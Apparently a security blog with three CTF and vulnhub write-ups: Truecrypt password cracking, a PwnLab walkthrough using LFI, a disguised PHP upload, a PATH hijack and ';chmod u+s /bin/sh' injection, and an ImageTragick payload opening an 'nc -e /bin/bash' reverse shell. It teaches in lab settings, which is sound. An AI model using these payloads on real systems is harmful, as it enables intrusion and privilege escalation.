checkban    ebd.sh   email.sh  fwconfig.sh  ssh.sh      telnet.sh
cleanup.sh  ebd.txt  ftp.sh    ssh          startup.sh  wp.sh

PRIVATE

Moving over to the /PRIVATE directory I found a hint file as well as an unknown file which later proved to be a Truecrypt volume based on the hint “truely cracks me up”.

root@BM:/PRIVATE# ls -lah
total 1.1M
drwx------  2 root  root  4.0K Aug 21 16:45 .
drwxr-xr-x 25 root  root  4.0K Aug 20 13:59 ..
-rw-rw-r--  1 billy billy 1.0M Aug 21 16:42 BowelMovement
-rw-r--r--  1 root  root   191 Aug 21 16:45 hint.txt


root@BM:/PRIVATE# cat hint.txt 
Heh, I called the file BowelMovement because it has the same initials as
Billy Madison.  That truely cracks me up!  LOLOLOL!

I always forget the password, but it's here:

https://en.wikipedia.org/wiki/Billy_Madison

-EG

I pulled the truecrypt volume down locally and created  a wordlist using cewl and the Wikipedia link provided.

root@mrb3n:~/Desktop/billymadison# cewl -v en.wikipedia.org/wiki/Billy_Madison -d 1 -w billy_madison.txt

When using cewl and Wikipedia to create wordlists we are left with lots of junk. The following command can be used to clean things up a bit.

root@mrb3n:~/Desktop/billymadison# cat billy_madison.txt | grep "\w\{7,\}" | grep -v "^wg" | head -n -50 > short_billy_madison.txt

Next I fired up truecrack against the truecrypt volume using the shiny new wordlist. 236 attempts in and we had a hit.

root@mrb3n:~/Desktop/billymadison# truecrack -t BowelMovement -w /root/rockyou.txt -v

231	inspired	NO
232	ignores		NO
233	initially	NO
234	calling		NO
235	execrable	YES
Found password:		"execrable"
Password length:	"10"
Total computations:	"236"

Now I had a password but I still had to mount the Truecrypt volume to see what the author had in store for us next. Kali Linux comes with cryptsetup which can be used to access a truecrypt container if we don’t have truecrypt installed. The following command will open the truecrypt container (after we enter the password).

root@mrb3n:~/Desktop/billymadison# cryptsetup open --type tcrypt /root/Desktop/billymadison/BowelMovement billy
Enter passphrase: 

Once open, we can mount the truecrypt container at a mountpoint of our choosing.

root@mrb3n:~/Desktop/billymadison# mount -t vfat /dev/mapper/billy /root/Desktop/billymadison/BowelMovement 

Browsing to the mountpoint I was presented with another zip file as well as a .doc file containing Billy’s final project. My heart sank for a moment, wondering what additional final password cracking challenge the author had in store. Lucky for us he was gracious enough to give up the final flag without a fight.

root@mrb3n:/media/root/4ED7-715F# unzip secret.zip 
Archive:  secret.zip
  inflating: Billy_Madison_12th_Grade_Final_Project.doc  
  inflating: THE-END.txt

The End

root@mrb3n:/media/root/4ED7-715F# cat THE-END.txt 
Congratulations!

If you're reading this, you win!

I hope you had fun.  I had an absolute blast putting this together.

I'd love to have your feedback on the box - or at least know you pwned it!

Please feel free to shoot me a tweet or email (7ms@7ms.us) and let me know with
the subject line: "Stop looking at me swan!"

Thanks much,

Brian Johnson
7 Minute Security
www.7ms.us

Billy Madison 12th Grade Final Project

Billy Madison
Final Project
Knibb High

                                       The Industrial Revolution

The Industrial Revolution to me is just like a story I know called "The Puppy Who Lost His Way." 
The world was changing, and the puppy was getting... bigger.

So, you see, the puppy was like industry. In that, they were both lost in the woods.
And nobody, especially the little boy - "society" - knew where to find 'em. 
Except that the puppy was a dog. 
But the industry, my friends, that was a revolution.

KNIBB HIGH FOOTBALL RULES!!!!!



-BM

Final thoughts

This boot2root was a ton of fun and brought my back to my childhood watching classic Adam Sandler movies. The author definitely upped the challenge from his previous Tommy Boy VM and presented us with a highly polished, well thought out scenario which required iterative/out-of-the-box thinking as well as chaining together a variety of tactics and tools.

Thanks to and props to @7minsec for putting together another great challenge and, as always, thank you to @g0tmi1k for keeping the #vulnhub community up and running.

PwnLab: init vulnhub walkthrough

It has been raining VMs lately over at vulnhub.com.

The latest, PwnLab: init, can be obtained here: https://www.vulnhub.com/entry/pwnlab-init,158/

Like 6Days Lab this had another fun web challenge.

As always, I started out with a super stealthy nmap scan 😉 .

Interesting, we have port 80 and 3306 (MySQL) open.

I fired up Hydra to attempt to brute force the MySQL login (because why not) and then loaded up the web application.

I spent quite some time here, attempted to brute force the login, checked for SQL injection, all to no avail.  The ‘page’ parameter on the main page looked ripe for LFI but all attempts thus far had failed. After some extensive research I came across this post which looked extremely promising and was very well researched and written:

https://diablohorn.com/2010/01/16/interesting-local-file-inclusion-method/

Basically, the php://input wrapper will allow you to read raw POST data by allowing you to add filters combined with functions such as readfile(). In this instance, the server will let you read certain resource files, echoing the contents back you base64 encoded. Sweet!

Well, I knew the config.php file existed but I was not yet able to read it so may as well go for the gold first. Throwing the request to Burp repeater got me my first bit of data.

 

Decoding the stream I was presented with credentials for the MySQL instance.

 

I also took the time to read the upload.php page.

 

The source of the upload.php page was particularly interesting. I could see that any uploaded document had to pass 3 checks before being accepted 1) it had to have a .jpg, .jpeg, .gif or .png extension 2) the mime type had to match one of the four extension and 3) it could not have multiple file extensions.

Logging in with the MySQL credentials I was presented with a database named ‘User’s with 3 entries with base64 encoded passwords.

The user table

Heading back over to the web application I was able to log in with one of the users and was presented with a simple upload form.

I needed to upload some PHP code (preferably a reverse shell) but trick the server into thinking I uploaded a valid gif file. Just putting the ‘GIF’ header in before the PHP started did the trick.

Now I needed a way to execute the PHP with in the “gif” image file. Looking back at what I had I pulled up the source of the index.php page. This page shows that the “lang” parameter gets set as a cookie. Perhaps this could be used to run our PHP code?

After some considering flopping around the following ran for me and gave a hit on my listener.

Once in, I turned to g0tmi1k’s handy privilege escalation guide (https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/) and starting enumerating the file system.  After a while I turned up a SUID binary owned by the user Mike. Great, my favorite.

The binary file was tiny so I did not expect too much was going on. Running it gets me a “permission denied” for trying to cat out a file in Mike’s home directory.

Loading up my trusty demo version of IDA confirmed that nothing more was going on.

Now, the binary was meant to call ‘cat’ but not with the absolute path so I could not use a symlink. I know that you can abuse a user’s PATH variable (http://www.dankalia.com/tutor/01005/0100501004.htm), but how could the 2 be combined? Since the binary runs as Mike I figured that this was not the path to obtain root but just the first step in privilege escalation. I moved over to the /tmp directory, created a file named ‘cat’ with /bin/sh as the contents and modified it to be executable.

Now, if I just ran the ‘cat’ command it would run /bin/sh. Cool. The next step was running the binary to call my fake ‘cat’ binary. Changing my path to just “.” meant that if I would be able to run the msgmike binary by just typing out the absolute path (/home/kane/msgmike). Doing this spawned a shell as Mike and after fixing up my path I was in as this user and ready for the next step.

Oh hey, another binary! This one didn’t need much of a look. As the previous one I can see it is just running one command, dropping the user into a prompt ‘Message for root:’ and then echoing out the user-supplied message to /root/messages.txt

Never trust user-supplied input! This one has command injection all over it. If we type a ; after the ‘Message for root:’ prompt we can redirect output to the command of our choice. I run it first with ‘;id’ and it shows the EUID for root.

To become root, not very stealthy as it involves a change to the file system (which we would not typically want to do in a production environment) we can append the command ‘;chmod u+s /bin/sh’.

I was fully expecting another binary challenge to grab the flag, but alas it was just a text file.

Shout-out to @chronicoder for putting together an awesome challenge. Looking forward to the next one.

Thanks goes to @g0tmi1k and the vulnhub team for keeping these resources flowing.

One-Hour CtF review

A colleague of mine who is very involved with SANS sent me an invitation for a new event last week called ‘One-Hour Ctf’. The event was, hosted by Ed Skoudis and the team that puts together the SANS NetWars and Holiday Hack Challenge, was invite-only and capped at 100 people so I felt special. The premise of the idea is simple, once per quarter the team will hold a lunchtime CTF event that starts out with a discussion of a relevant topic, then turns the participants loose for 40 minutes to capture 1 or more flags, ending with a discussion of the solution and notification of the winners.

https://www.onehourctf.com/

The first event dealt with the recent imagemagick exploit(s) (http://imagetragick.com/). The presenters did a great quick walk-through of the vulnerability and provided some slides with additional info. One of the best parts of this event was that you do not need to spin up a VM and can participate from any PC that has a web browser. Once logged in to the site, each participant is given their own Docker image based on Avocado with console access to an attacking machine as well as browser access to the target web application.

The challenge consisted of uploading a malicious image file, catching a shell and reading out a flag. To grab a reverse shell I uploaded a file with a jpeg extension containing the following:

push graphic-context
viewbox 0 0 640 480
fill 'url(https://blah.com/blah.png";nc -e /bin/bash 8080")'
pop graphic-context

I fired up a netcat listener and uploaded the image. Since there were so many people uploading at the same time it took a while but I eventually got a shell back and the first flag. There was a second flag which utilized another portion of the imagemagick vulnerability chained together with a misconfiguration. While I did end up obtaining both flags, I will not post the solution for the second as the organizers did not discuss it.

Overall I thoroughly enjoyed the event and thought the organizers/presenters pulled it off flawlessly during the one hour time frame, which is quite a feat (especially for a beta run).

The final scoreboard: